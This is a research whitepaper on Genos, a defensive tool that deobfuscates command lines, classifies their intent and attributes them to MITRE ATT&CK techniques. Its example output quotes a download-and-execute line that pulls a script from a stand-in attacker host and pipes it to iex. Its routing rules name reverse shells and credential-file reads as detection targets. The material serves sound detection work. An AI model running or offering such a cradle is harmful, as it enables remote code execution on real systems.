Genos: Command Intelligence for Real-Time Behavioral Threat Detection and MITRE ATT&CK Attribution

Ahmed Khan

Genos v1.2 · IEEE AIIoT 2026 · Research Whitepaper

Executive Summary

Security tools collect raw telemetry, but analysts still need to interpret intent. Genos introduces command intelligence: a hybrid system that deobfuscates command-line activity, classifies behavioral intent, and maps malicious actions to MITRE ATT&CK techniques in milliseconds. The system achieves a Tier 1 AUC of 0.9999 and an F1 score of 99.96% on binary threat classification, and 95.53% Top-1 / 97.94% Top-3 accuracy on 108-class MITRE technique attribution, operating at sub-100 ms latency without cloud inference or external API calls. Genos is the research artifact underlying two accepted IEEE AIIoT 2026 papers and is designed as a deployable, analyst-facing intelligence layer for SOC triage, SIEM enrichment, and automated threat attribution.

Contents

1. The Problem with Command-Level Alert Triage
2. Command Intelligence as a Security Decision Layer
3. System Architecture Overview
4. Deobfuscation and Feature Extraction
5. Two-Stage Machine Learning Pipeline
   5.1 Tier 1: Gatekeeper
   5.2 Tier 2: Specialist
6. Hybrid Rule-Based and Learned Inference
7. Output Schema and Example Results
8. Benchmark Results
9. Security Operations Use Cases
10. API and Integrations
11. Deployment Architecture
12. Research Background and Publications
13. Future Work
14. References and Citation
Appendix — Technical Reference

1. The Problem with Command-Level Alert Triage

Command-line activity is one of the richest behavioral signals available to a defender. Every living-off-the-land attack, every credential theft, every lateral movement attempt leaves a trace in process telemetry — yet most security platforms treat command-line data as opaque text, passing it through signature rules or handing it to an analyst with no structured interpretation.

The core difficulty is threefold. First, malicious commands are routinely obfuscated: Base64-encoded payloads, PowerShell character-code constructions, string concatenation, and nested encoding layers are standard adversary practice. A raw string match fails against these techniques by design. Second, even a plaintext command is deeply context-dependent — net user /domain is reconnaissance in one environment and routine IT administration in another. Third, the volume of command-line events in any moderately active environment is large enough that manual triage at scale is not feasible.

Existing approaches — YARA rules, keyword blocklists, traditional SIEM correlation — are brittle, require continuous manual maintenance, and produce high false-positive rates against obfuscated or novel payloads. Large language model-based approaches offer flexibility but introduce latency, cost, and non-determinism that are incompatible with real-time SOC workflows.

Analysts need a system that can decode, classify, and explain a command in one step — without cloud round-trips, without per-query billing, and without black-box outputs that cannot be audited.

2. Command Intelligence as a Security Decision Layer

Genos is built around the concept of command intelligence: a structured, machine-readable behavioral interpretation of a raw command string. Rather than asking "does this match a known bad signature?", Genos asks three questions in sequence:

Is this command obfuscated? If so, recover the intended payload before any classification.
What is the behavioral intent? Route the command into a verdict — Benign, Suspicious, Malicious, or Context-Dependent — with a calibrated confidence score.
Which adversary technique does this represent? Map the command to one or more MITRE ATT&CK technique identifiers with per-technique confidence scores.

This three-question structure produces output that is immediately actionable: an analyst or automated system can triage, escalate, or suppress an alert based on a verdict and a named technique, rather than a raw alert count or a signature ID.

Command intelligence is designed to be a decision layer — sitting between raw telemetry collection (EDR, SIEM, UEBA) and analyst workflow — rather than a replacement for existing detection infrastructure. It enriches existing alerts with behavioral context and ATT&CK-aligned attribution that current tooling does not provide.

3. System Architecture Overview

Genos processes every command through a sequential pipeline of three processing stages, followed by assembly of a structured JSON response. Each stage produces structured output that feeds the stages after it.

Raw Command Input
   │
   ▼
Stage 1: Entropy-Aware Deobfuscation
   Detects encoding / obfuscation → iterative decoding
   Output: decoded command + obfuscation flag
   │
   ▼
Stage 2 (Tier 1): Gatekeeper (Neural)
   CodeBERT encoder → 3-class verdict + confidence
   Rule-based routing layer overlaid on neural output
   Output: Benign / Suspicious / Malicious / Context-Dependent
   │
   ▼
Stage 3 (Tier 2): Specialist (Classical ML)
   TF-IDF char n-gram + Random Forest
   108-class MITRE ATT&CK attribution (always runs)
   Output: top-5 technique codes + per-code confidence
   │
   ▼
Structured JSON Response
   verdict · confidence · MITRE codes · decoded payload

The two-tier inference design is deliberate. Tier 1 is a neural model: accurate and generalizable, but slower to train and update. Tier 2 is a classical ML pipeline: fast to retrain on new ATT&CK technique data, interpretable via feature weights, and independent of the neural model's internal representations. Keeping them separate means either tier can be improved or retrained without affecting the other.

The entire pipeline is served as a REST API via Gunicorn and Flask, bound to localhost and designed to sit behind a reverse proxy. No external inference calls are made at runtime — all computation is local.

4. Deobfuscation and Feature Extraction

A critical requirement for any command intelligence system is the ability to handle adversarial encoding. In practice, a significant fraction of malicious commands in the wild are obfuscated — specifically to defeat signature-based detection. Genos addresses this with an entropy-aware, iterative deobfuscation pipeline that runs before any classification.

Obfuscation is detected using a combination of Shannon entropy thresholding (commands exceeding 5.2 bits/character are flagged) and pattern matching against six structural indicators: PowerShell character-code constructions, inline Base64 references, string reversal wrappers, concatenation fragments, long obfuscated variable names, and hex byte escapes.
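A minimal sketch of this detection step follows. The 5.2 bits/character threshold comes from the text above; the regular expressions for the six indicators are hypothetical stand-ins written for illustration, not the patterns Genos actually uses.

```python
import math
import re
from collections import Counter
from typing import List, Tuple

ENTROPY_THRESHOLD = 5.2  # bits/character, from the text

# Hypothetical patterns for the six structural indicators (illustrative only).
INDICATORS = {
    "char_code": re.compile(r"\[char\]\s*\d+", re.IGNORECASE),
    "inline_base64": re.compile(
        r"frombase64string|-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.IGNORECASE
    ),
    "string_reversal": re.compile(r"\[array\]::reverse", re.IGNORECASE),
    "concatenation": re.compile(r"""(['"][^'"]{1,4}['"]\s*\+\s*){3,}"""),
    "long_variable": re.compile(r"\$[A-Za-z0-9_]{25,}"),
    "hex_escape": re.compile(r"(\\x[0-9a-fA-F]{2}){4,}"),
}


def shannon_entropy(text: str) -> float:
    """Shannon entropy of the character distribution, in bits per character."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def detect_obfuscation(command: str) -> Tuple[bool, List[str]]:
    """Flag a command if its entropy exceeds the threshold or any indicator matches."""
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(command)]
    return shannon_entropy(command) > ENTROPY_THRESHOLD or bool(hits), hits
```

An entropy above 5.2 bits/character requires at least 37 distinct symbols (since 2^5.2 ≈ 36.8), which is why long Base64 blobs tend to cross the threshold while ordinary short commands do not; the structural indicators cover obfuscated commands that stay below it.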

When obfuscation is detected, the engine runs up to five decoding passes in sequence, applying: universal Base64 decoding, embedded FromBase64String() extraction, PowerShell invocation wrapper stripping, character-code resolution ([char]65, range-expansion patterns), and string concatenation collapsing. An optional AST-level simplification step is applied if the pyminusone library is installed. Each pass operates on the output of the previous, and the loop exits early when a pass produces no further entropy reduction (delta < 0.01 bits).
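The bounded decoding loop can be sketched as follows. This is an illustrative subset, not the Genos engine: it implements only three of the listed transforms (Base64 decoding of a PowerShell -EncodedCommand argument, [char]N resolution, and quoted-string concatenation collapsing), and all helper names are hypothetical. The five-pass bound and the 0.01-bit early exit follow the text.

```python
import base64
import math
import re
from collections import Counter
from typing import Optional, Tuple

MAX_PASSES = 5    # bound from the text; guards against "deobfuscation bombs"
MIN_DELTA = 0.01  # bits/char; stop once a pass no longer reduces entropy

# Hypothetical patterns for three of the transforms named in the text.
ENC_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
CHAR_CODE = re.compile(r"\[char\]\s*(\d{1,5})", re.IGNORECASE)
CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def shannon_entropy(text: str) -> float:
    """Shannon entropy of the character distribution, in bits per character."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def try_b64(blob: str) -> Optional[str]:
    """Strict Base64 decode; UTF-16LE if NUL bytes appear (PowerShell -EncodedCommand)."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le" if b"\x00" in raw else "utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None


def decode_pass(cmd: str) -> str:
    """One pass: -EncodedCommand payload, then [char]N, then 'a' + 'b' collapsing."""
    match = ENC_ARG.search(cmd)
    if match:
        decoded = try_b64(match.group(1))
        if decoded is not None:
            cmd = decoded
    # [char]73 -> 'I', quoted so the concatenation step can join neighbours
    cmd = CHAR_CODE.sub(lambda m: "'" + chr(int(m.group(1))) + "'", cmd)
    previous = None
    while previous != cmd:  # each substitution shortens cmd, so this terminates
        previous = cmd
        cmd = CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), cmd)
    return cmd


def deobfuscate(cmd: str) -> Tuple[str, int]:
    """Run up to MAX_PASSES passes; return (decoded text, passes run)."""
    current, entropy = cmd, shannon_entropy(cmd)
    for n in range(1, MAX_PASSES + 1):
        candidate = decode_pass(current)
        new_entropy = shannon_entropy(candidate)
        delta = entropy - new_entropy
        current, entropy = candidate, new_entropy
        if delta < MIN_DELTA:  # no meaningful entropy reduction: stop early
            return current, n
    return current, MAX_PASSES
```

Under these assumptions, deobfuscate("powershell -enc SQBuAHYAbwBrAGUA") decodes the UTF-16LE payload to "Invoke" on the first pass and stops on the second, when the text no longer changes. Trying UTF-16LE when NUL bytes appear reflects PowerShell's -EncodedCommand convention, which Base64-encodes UTF-16LE text.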

For Tier 2 attribution, the engine uses a structured "Variant A" text representation produced by the parser module, which extracts residual tokens — flags, arguments, paths, executables — separately from the normalized command body. This representation exposes structural features that improve technique attribution beyond raw text matching.

For obfuscated commands, Tier 2 runs twice — once on the original text, once on the decoded payload — and the results are merged by taking the highest confidence score per technique code, capped at five techniques in the final response.
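The merge rule (highest confidence per technique code, capped at five) is short enough to state directly in code. A minimal sketch, assuming each Tier 2 result is a list of {"code", "confidence"} dictionaries shaped like the MITRE_codes field in Section 7; the function name is hypothetical.

```python
from typing import Dict, List


def merge_attributions(original: List[dict], decoded: List[dict], limit: int = 5) -> List[dict]:
    """Merge two Tier 2 result lists: highest confidence per code, top `limit` overall."""
    best: Dict[str, float] = {}
    for entry in original + decoded:
        code, confidence = entry["code"], entry["confidence"]
        if confidence > best.get(code, float("-inf")):
            best[code] = confidence
    ranked = sorted(best.items(), key=lambda item: item[1], reverse=True)
    return [{"code": code, "confidence": conf} for code, conf in ranked[:limit]]
```

Taking the maximum rather than the average means a technique that is only visible after decoding keeps its full confidence instead of being diluted by the low score it received on the obfuscated text.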

5. Two-Stage Machine Learning Pipeline

5.1 Tier 1: Gatekeeper

The Gatekeeper is a fine-tuned CodeBERT model trained for three-class classification: Benign, Malicious, and Context-Dependent. CodeBERT was selected over general-purpose language models because it was pre-trained on both natural language and code corpora, giving it a structural understanding of command syntax, flag conventions, and common shell patterns that generic text encoders lack.

The classification head is a two-layer MLP with GELU activation and dropout regularization, operating on the CLS token representation (768 dimensions). Inference runs under mixed-precision autocast — float16 on CUDA, bfloat16 on CPU — making it feasible to run on a single consumer GPU or a standard CPU server without significant latency penalty.

The Gatekeeper's raw neural output is a probability distribution over three classes. This distribution is then passed to a rule-based routing layer before the final verdict is issued, described in Section 6.

5.2 Tier 2: Specialist

The Specialist is a scikit-learn pipeline combining TF-IDF character n-gram features with a Random Forest classifier, trained to attribute commands to one of 108 MITRE ATT&CK techniques. It runs on every request regardless of the Tier 1 verdict — even commands classified as Benign receive a technique attribution, which can surface legitimate administrative commands that map to adversary-relevant behaviors (e.g., net user /domain mapping to T1087 — Account Discovery).

The choice of TF-IDF + Random Forest for Tier 2 is deliberate. Character n-gram features capture subword patterns (flag combinations, executable names, argument structure) that are highly informative for technique attribution and that persist across obfuscation variants. Random Forest yields per-class probability estimates directly, averaged across its trees (these are not calibrated probabilities by default), and can be retrained on new technique data in minutes rather than hours, making it practical to keep the technique map current as the ATT&CK framework evolves.
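To illustrate why character n-grams tolerate surface variation, the sketch below extracts n-grams from lower-cased commands and compares their vocabularies. It shows the raw features only: TF-IDF weighting and the Random Forest are omitted, and the 2-to-4 n-gram range is an assumption, not the Specialist's actual configuration.

```python
from collections import Counter


def char_ngrams(text: str, n_min: int = 2, n_max: int = 4) -> Counter:
    """Count character n-grams of length n_min..n_max in a lower-cased command."""
    text = text.lower()
    grams: Counter = Counter()
    for n in range(n_min, n_max + 1):
        for i in range(len(text) - n + 1):
            grams[text[i:i + n]] += 1
    return grams


def jaccard(a: Counter, b: Counter) -> float:
    """Share of n-gram types that two commands have in common (0.0 to 1.0)."""
    union = set(a) | set(b)
    return len(set(a) & set(b)) / len(union) if union else 0.0
```

"net user /domain" and "net.exe user /domain" share most of their n-grams, while "whoami" shares none with either. In scikit-learn, the corresponding feature extractor would be TfidfVectorizer(analyzer="char", ngram_range=(2, 4)), which lower-cases by default and adds IDF weighting on top of the counts.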

Tier 2 inference takes approximately 90 ms and runs synchronously with Tier 1, adding negligible end-to-end latency relative to the neural forward pass.

6. Hybrid Rule-Based and Learned Inference

A key architectural decision in Genos is the explicit separation of neural inference and deterministic rule evaluation. The Gatekeeper neural model produces a raw probability distribution, but this distribution is then processed by a rule-based routing layer before the final verdict is issued.

The routing layer operates in four modes:

Hard override to Malicious. Certain command patterns — Base64-decode piped to a shell interpreter, reverse shell constructions, direct reads of credential files — are treated as unconditionally malicious regardless of model confidence. These patterns represent confirmed attack techniques where no ambiguity is operationally acceptable.
Malicious promotion. Commands featuring high-risk behavioral signals (exploit tooling, access to sensitive system resources) that the neural model rates as weakly Benign or Suspicious are promoted to Malicious. This handles edge cases where the model generalizes conservatively.
Malicious cap. Commands that carry inherent risk but lack definitive attack indicators — for example, chmod 777 or crontab -l — are downgraded from Malicious to Suspicious, preventing over-escalation on common administrative operations.
Probability routing. Remaining cases are routed by a combination of confidence threshold, class margin, suspicious signal count, and extracted feature set — producing Benign, Suspicious, Malicious, or Context-Dependent verdicts accordingly.
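The four routing modes can be sketched as an ordered sequence of checks. Everything concrete here is hypothetical: the regular expressions, the 0.90 confidence threshold, and the 0.20 margin are placeholders, and the sketch omits the suspicious-signal count and feature-set inputs that the real routing layer also uses. What it does show is the ordering (hard overrides before any probability logic) and the traceability property: every Verdict carries the name of the rule or threshold that produced it.

```python
import re
from dataclasses import dataclass

# Every pattern and threshold here is a hypothetical placeholder, not Genos's rule set.
HARD_MALICIOUS = {
    "b64_pipe_shell": re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba|z|da)?sh\b"),
    "reverse_shell": re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"),
    "credential_read": re.compile(r"\bcat\s+/etc/shadow\b"),
}
HIGH_RISK = {"cred_dump_tool": re.compile(r"\b(mimikatz|sekurlsa|procdump)\b", re.IGNORECASE)}
CAPPED = {
    "chmod_777": re.compile(r"\bchmod\s+777\b"),
    "crontab_list": re.compile(r"\bcrontab\s+-l\b"),
}


@dataclass
class Verdict:
    label: str
    model_confidence: float  # Tier 1 top-class probability, as a percentage
    reason: str              # the rule or threshold that decided, for auditability


def first_hit(rules: dict, command: str):
    """Return the name of the first matching rule, or None."""
    return next((name for name, rx in rules.items() if rx.search(command)), None)


def route(command: str, probs: dict, threshold: float = 0.90, margin: float = 0.20) -> Verdict:
    """probs: Tier 1 distribution over Benign, Malicious and Context_Dependent."""
    ranked = sorted(probs.items(), key=lambda kv: kv[1], reverse=True)
    (top, p_top), (_, p_second) = ranked[0], ranked[1]
    conf = round(100 * p_top, 2)
    if (rule := first_hit(HARD_MALICIOUS, command)):
        return Verdict("Malicious", conf, f"hard_override:{rule}")
    if top != "Malicious" and p_top < threshold and (rule := first_hit(HIGH_RISK, command)):
        return Verdict("Malicious", conf, f"promotion:{rule}")
    if top == "Malicious" and (rule := first_hit(CAPPED, command)):
        return Verdict("Suspicious", conf, f"cap:{rule}")
    if p_top >= threshold and p_top - p_second >= margin:
        return Verdict(top, conf, "probability:confident")
    if top == "Context_Dependent":
        return Verdict("Context_Dependent", conf, "probability:needs_context")
    return Verdict("Suspicious", conf, "probability:low_confidence")
```

Because the checks run in a fixed order, a reverse shell is labelled Malicious even when the model is 90% confident it is Benign, and a chmod 777 that the model rates as Malicious is capped at Suspicious.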

This hybrid architecture is intentional. Pure neural approaches achieve high accuracy on in-distribution data but can produce unexpected outputs on novel obfuscation patterns or adversarially crafted inputs. Pure rule systems are brittle and require constant manual maintenance. The combination — neural model providing the base distribution, deterministic rules providing hard constraints and behavioral guardrails — produces a system that is both accurate and operationally auditable.

Every verdict issued by Genos is traceable: either to a model confidence score and routing threshold, or to a named rule that fired. This auditability is a first-class design requirement.

7. Output Schema and Example Results

Every Genos response is a structured JSON object. The schema is consistent across all verdict types, with additional fields populated for obfuscated inputs and context-dependent classifications.

Example: Malicious command (encoded PowerShell download-and-execute cradle):

{
  "label": "Malicious",
  "label_confidence": 99.81,
  "deobfuscated_cmd": "invoke-webrequest http://attacker.com/malware.sh | iex",
  "MITRE_codes": [
    { "code": "T1059.001", "confidence": 97.43 },
    { "code": "T1071.001", "confidence": 1.22 },
    { "code": "T1105",     "confidence": 0.81 },
    { "code": "T1027",     "confidence": 0.48 },
    { "code": "T1086",     "confidence": 0.06 }
  ],
  "decoded_payload": "Invoke-WebRequest http://attacker.com/malware.sh | IEX"
}

Example — Benign administrative command:

{
  "label": "Benign",
  "label_confidence": 99.99,
  "deobfuscated_cmd": null,
  "MITRE_codes": []
}

Example — Context-dependent command requiring analyst review:

{
  "label": "Context_Dependent",
  "action": "requires_context",
  "label_confidence": 71.4,
  "MITRE_codes": [
    { "code": "T1087", "confidence": 88.21 }
  ]
}

Output field reference

Field	Type	Description
label	string	Verdict: Benign, Suspicious, Malicious, or Context_Dependent
label_confidence	float	Calibrated confidence as a percentage (0–100)
MITRE_codes	array	Top-5 technique attributions with per-code confidence; present on all responses
deobfuscated_cmd	string or null	Decoded command text; null if no obfuscation was detected
decoded_payload	string	Populated for obfuscated inputs with a recoverable payload
action	string	Set to "requires_context" for Context_Dependent verdicts

8. Benchmark Results

Genos was evaluated against held-out test splits and a deployment-aligned IEEE benchmark comparing the full neural pipeline against a TF-IDF + Random Forest baseline across multiple traffic compositions and obfuscation scenarios.

Metric	Value
Tier 1 AUC	0.9999
Tier 1 F1	99.96%
Tier 2 Top-1 accuracy	95.53%
Tier 2 Top-3 accuracy	97.94%
Tier 2 latency	~90 ms

The IEEE benchmark evaluated the pipeline at multiple benign-to-malicious traffic ratios to simulate realistic SOC telemetry distributions. Results were stable across ratios, with no significant degradation in precision at high benign traffic volumes — a critical property for operational deployment where false-positive rates directly affect analyst workload.

The stress test (500 concurrent requests, 50% malicious, 20 concurrent client workers) confirmed consistent throughput within the target latency envelope. Full benchmark artefacts (ROC curves, per-class F1 breakdowns, and latency distributions) are available in the repository's logs/ directory.

LLM comparison context

Genos was also benchmarked against LLM-based classification approaches for command intent labeling. The neural + rule hybrid pipeline matched or exceeded LLM accuracy on the evaluated corpus while operating at a fraction of the latency and without per-query API cost — a meaningful operational advantage for high-volume telemetry environments.

9. Security Operations Use Cases

SOC Alert Triage

Genos can be integrated into a SOC workflow as a first-pass triage layer. Rather than routing every command-line alert to an analyst, a Genos verdict of Benign with high confidence can suppress the alert automatically. Malicious verdicts with ATT&CK technique codes are escalated directly to the relevant analyst queue with pre-populated context — reducing the time between detection and investigation from minutes to seconds.
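A first-pass triage policy of this kind might look like the sketch below. The 99.0 suppression threshold and the action names are hypothetical; the response fields follow the schema in Section 7.

```python
SUPPRESS_THRESHOLD = 99.0  # hypothetical: only auto-close very confident Benign verdicts


def triage(response: dict) -> dict:
    """Map a Genos response to a SOC action under a hypothetical policy."""
    label = response["label"]
    confidence = response.get("label_confidence", 0.0)
    techniques = [entry["code"] for entry in response.get("MITRE_codes", [])]
    if label == "Benign" and confidence >= SUPPRESS_THRESHOLD:
        action = "suppress"
    elif label == "Malicious":
        action = "escalate"  # techniques travel with the ticket as pre-populated context
    elif label == "Context_Dependent":
        action = "enrich_and_rescan"  # see the Automated Incident Response use case
    else:  # Suspicious, or Benign below the suppression threshold
        action = "analyst_queue"
    return {"action": action, "techniques": techniques}
```

Keeping low-confidence Benign verdicts in the analyst queue, rather than suppressing every Benign label, bounds the cost of a model error on novel inputs.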

SIEM Enrichment

Genos output can be written back to a SIEM as structured fields: verdict, confidence, MITRE technique IDs, and decoded payload. This transforms raw process creation logs into queryable behavioral data. Analysts can write SIEM rules against mitre_code:T1059 rather than maintaining fragile regex patterns against raw command text.
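One way to write the response back as queryable fields is to flatten it and also derive parent technique IDs, so that a rule on T1059 also matches sub-techniques such as T1059.001. The genos.* field names below are hypothetical.

```python
def to_siem_fields(response: dict, prefix: str = "genos") -> dict:
    """Flatten a Genos response into event fields (field names are hypothetical)."""
    codes = [entry["code"] for entry in response.get("MITRE_codes", [])]
    fields = {
        f"{prefix}.verdict": response["label"],
        f"{prefix}.confidence": response.get("label_confidence"),
        f"{prefix}.mitre_code": codes,
        # T1059.001 -> T1059, so a rule on the parent technique also matches sub-techniques
        f"{prefix}.mitre_parent": sorted({code.split(".")[0] for code in codes}),
    }
    if response.get("decoded_payload"):
        fields[f"{prefix}.decoded_payload"] = response["decoded_payload"]
    return fields
```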

MSSP and MDR Platforms

For managed security providers handling telemetry from multiple clients, Genos provides a consistent, vendor-agnostic behavioral labeling layer. Because the pipeline runs locally and requires no external connectivity, it can be deployed in air-gapped or restricted environments where cloud inference is not permitted.

Automated Incident Response

The Context-Dependent verdict class is specifically designed for integration with automated decision workflows. When Genos returns action: requires_context, a downstream orchestration system can query additional telemetry — parent process, user context, network connections — and re-submit the enriched command for a final classification decision without human intervention.

10. API and Integrations

Genos exposes a minimal REST API served by Gunicorn on 127.0.0.1:6001 by default, designed to sit behind a reverse proxy. Two scan endpoints are available.

POST /scan — production endpoint, MongoDB API-key authentication:

curl -X POST https://your-deployment/scan \
  -H "Content-Type: application/json" \
  -d '{"api_key": "YOUR_KEY", "command": "net user /domain"}'

POST /scan/internal — no-database endpoint for CI, testing, and integration:

curl -X POST http://127.0.0.1:6001/scan/internal \
  -H "Content-Type: application/json" \
  -d '{"command": "powershell -enc SQBuAHYAbwBrAGUA..."}'

The command field accepts both plain text and Base64-encoded strings. The API attempts a full Base64 decode before passing to the engine, falling back to plain text transparently — which means SIEM and EDR integrations can forward raw process arguments without pre-processing.
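The decode-or-fall-back behavior can be sketched as follows, assuming a strict full-string decode and UTF-8 payloads; the real API's heuristics may differ, and the function name is hypothetical. The extra checks matter because short plain words such as "test" are themselves valid Base64.

```python
import base64


def normalize_command(field: str) -> str:
    """Return the Base64-decoded command if `field` decodes cleanly, else `field` unchanged."""
    try:
        text = base64.b64decode(field.strip(), validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error (bad Base64) and UnicodeDecodeError
        return field
    # Plain words like "test" are valid Base64 too; the UTF-8 decode above and this
    # printability check reject most such accidental decodes. Multi-line scripts also
    # fail isprintable() and fall back to the raw field, a limitation of this sketch.
    if not text or not text.isprintable():
        return field
    return text
```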

Integration with SIEM platforms can be achieved with an enrichment stage that calls the scan endpoint and writes the response fields back to the original event document, for example a Logstash pipeline using its http filter plugin. Python and Bash integration examples are included in the repository.
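For a Python integration, a minimal standard-library client might look like the sketch below. The endpoint URLs and JSON fields come from the curl examples above; the function names are hypothetical, and because the way INTERNAL_TEST_TOKEN is transmitted is not documented here, the sketch does not send it.

```python
import json
import urllib.request
from typing import Optional

INTERNAL_URL = "http://127.0.0.1:6001/scan/internal"


def build_scan_request(command: str, url: str = INTERNAL_URL,
                       api_key: Optional[str] = None) -> urllib.request.Request:
    """Build a JSON POST for /scan/internal, or for /scan when api_key is given."""
    payload = {"command": command}
    if api_key is not None:
        payload["api_key"] = api_key  # /scan expects the key in the JSON body
    return urllib.request.Request(
        url,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def scan(command: str, timeout: float = 10.0, **kwargs) -> dict:
    """Send the request and return the parsed JSON verdict."""
    request = build_scan_request(command, **kwargs)
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return json.load(response)
```

Against a local instance, scan("net user /domain") would return the JSON verdict; for the production endpoint, pass url="https://your-deployment/scan" and api_key="YOUR_KEY".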

11. Deployment Architecture

Genos is designed for single-server deployment with a reverse proxy. The Gunicorn worker is single-process to avoid multiplying GPU memory usage — a second worker would require a second copy of the CodeBERT model in VRAM. On a machine with a dedicated GPU and cached model weights, startup takes under 60 seconds; on CPU-only hardware, startup is longer but inference remains operationally viable at reduced throughput.

Deployment model

Internet / Internal Network
          │
          ▼
[ Nginx / Caddy ]        TLS termination, rate limiting
          │
          ▼
[ Gunicorn worker ]      127.0.0.1:6001, single process
    [ Flask app ]
    [ GenosEngine ]      Tier 1 (GPU) + Tier 2 (CPU)
          │
          ▼
[ MongoDB ]              API key auth + usage tracking

The system includes several hardening measures: the Tier 1 PyTorch checkpoint is loaded with weights_only=True to prevent arbitrary code execution via malicious checkpoints (this protection does not extend to the pickled Tier 2 model, which must come from a trusted source); the deobfuscation loop is bounded to five passes with an entropy-delta early exit to prevent deobfuscation bombs; the internal scan endpoint is firewall-protected and optionally token-gated; and no real credentials or secrets are committed to the repository.

12. Research Background and Publications

Genos is the primary research artifact from two papers accepted to the IEEE World AI IoT Congress (AIIoT 2026), Seattle, USA. Both papers are first-authored by Ahmed Khan.

Publication [1]

A Two-Stage Transformer-Based Framework for Command-Line Classification and MITRE ATT&CK Technique Mapping

Presents the cascaded CodeBERT + TF-IDF/RF architecture, deobfuscation pipeline, and evaluation results across 141 technique classes. Reports Tier 1 AUC 0.9999 / F1 99.96% and Tier 2 95.53% Top-1 / 97.94% Top-3 accuracy.

Publication [2]

Open-Source Next Gen Endpoint Detection & Response

Presents a kernel-driverless Ring 3 EDR research system using LoRA-fine-tuned RoBERTa for 4-class MITRE ATT&CK behavior detection, achieving 99.5% accuracy across a 1,200-case adversarial stress suite.

Both papers have been accepted to the IEEE AIIoT 2026 programme. PDFs, BibTeX, and supplementary materials will be linked here upon publication.

13. Future Work

The current Genos pipeline classifies each command independently. The most significant planned extension is sequence-level reasoning: modeling chains of commands — execution followed by persistence followed by lateral movement — as a temporally ordered adversary behavior graph, enabling detection of multi-stage attacks that are individually ambiguous but collectively unambiguous.

Additional planned directions include: expanded ATT&CK coverage beyond the current 108-technique Specialist map; integration of structured shell AST features as complementary inputs alongside TF-IDF representations; investigation of structure-aware pre-training objectives that better capture the syntactic properties of command-line data; and evaluation on cross-platform telemetry (Linux, macOS) beyond the current Windows-heavy training distribution.

14. References and Citation

If you use Genos or build on this work, please cite the associated IEEE papers:

BibTeX

@inproceedings{khan2026genos,
  title     = {A Two-Stage Transformer-Based Framework for Command-Line
               Classification and MITRE ATT\&CK Technique Mapping},
  author    = {Khan, Ahmed},
  booktitle = {Proceedings of the IEEE World AI IoT Congress (AIIoT 2026)},
  year      = {2026},
  address   = {Seattle, USA}
}

@inproceedings{khan2026edr,
  title     = {Open-Source Next Gen Endpoint Detection \& Response},
  author    = {Khan, Ahmed},
  booktitle = {Proceedings of the IEEE World AI IoT Congress (AIIoT 2026)},
  year      = {2026},
  address   = {Seattle, USA}
}

Appendix — Technical Reference

The following sections contain implementation-level detail intended for developers integrating or extending Genos. They are not part of the primary research narrative.

A.1 — Tokenisation

Uses RobertaTokenizer from microsoft/codebert-base. Max length: 256 tokens (override with GENOS_MAX_TOKENS). Padding: max_length. Truncation enabled. Returns PyTorch tensors.

A.2 — Gatekeeper Architecture

CodeBERT [CLS] token (768-d) → Dropout(0.2) → Linear(768 → 1024) → GELU → Dropout(0.2) → Linear(1024 → 3)

Inference under torch.no_grad() + torch.amp.autocast: float16 on CUDA, bfloat16 on CPU.
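As a size check, the head above has parameters only in its two Linear layers (Dropout and GELU are parameter-free), so its parameter count is:

```latex
\underbrace{768 \times 1024 + 1024}_{\text{Linear}(768 \to 1024)}
\;+\;
\underbrace{1024 \times 3 + 3}_{\text{Linear}(1024 \to 3)}
= 787{,}456 + 3{,}075 = 790{,}531
```

That is well under 1% of the roughly 125M parameters in the CodeBERT encoder, so nearly all of Tier 1's memory footprint comes from the encoder rather than the classification head.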

A.3 — Environment Variables

Variable	Default	Purpose
MONGO_URI	—	MongoDB connection string; enables /scan
INTERNAL_TEST_TOKEN	—	Optional token for /scan/internal
GENOS_API_BIND	127.0.0.1:6001	Gunicorn bind address
GENOS_MAX_TOKENS	256	Tokeniser max sequence length

A.4 — Model Files

File	Purpose
models/gatekeeper.pt	Tier 1 CodeBERT weights (Git LFS)
models/specialist_tfidf_char_rf.pkl	Tier 2 active model (not in git, ~2.4 GB)
config/specialist_map.json	108-class MITRE technique index
config/gatekeeper_meta.json	Threshold and training metadata

A.5 — Startup Sequence

GenosEngine is constructed once on process start — no hot-reload. Asset paths are resolved in order: absolute path → relative to os.getcwd() → relative to engine.py directory. A warmup pass runs before traffic is accepted; GET /health returns {"status":"ok"} once complete.
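The lookup order can be sketched as below. This is not engine.py itself: the function name is hypothetical, and the engine directory is passed in explicitly (inside a real module it would typically be os.path.dirname(os.path.abspath(__file__))).

```python
import os
from pathlib import Path
from typing import Optional


def resolve_asset(path: str, engine_dir: str) -> Optional[Path]:
    """Resolve an asset: absolute path, then cwd-relative, then engine-dir-relative."""
    p = Path(path)
    if p.is_absolute():
        return p if p.exists() else None
    for base in (Path(os.getcwd()), Path(engine_dir)):
        candidate = base / p
        if candidate.exists():
            return candidate
    return None
```

Checking the working directory before the engine directory lets an operator override a bundled asset simply by launching the server from a directory that contains a replacement file.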

A.6 — Gunicorn Settings

Setting	Value	Reason
workers	1	One model copy in GPU memory
worker_class	sync	CUDA cannot survive post-fork
timeout	300 s	Covers model load on startup
preload_app	unset	Prevents fork after CUDA init
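Because Gunicorn configuration files are plain Python, the settings above can be expressed as a gunicorn.conf.py. A sketch, assuming GENOS_API_BIND is read at config time (the source does not say where that variable is consumed):

```python
# gunicorn.conf.py: a sketch of the A.6 settings (Gunicorn config files are plain Python).
import os

# Reading GENOS_API_BIND here is an assumption about how the variable is consumed.
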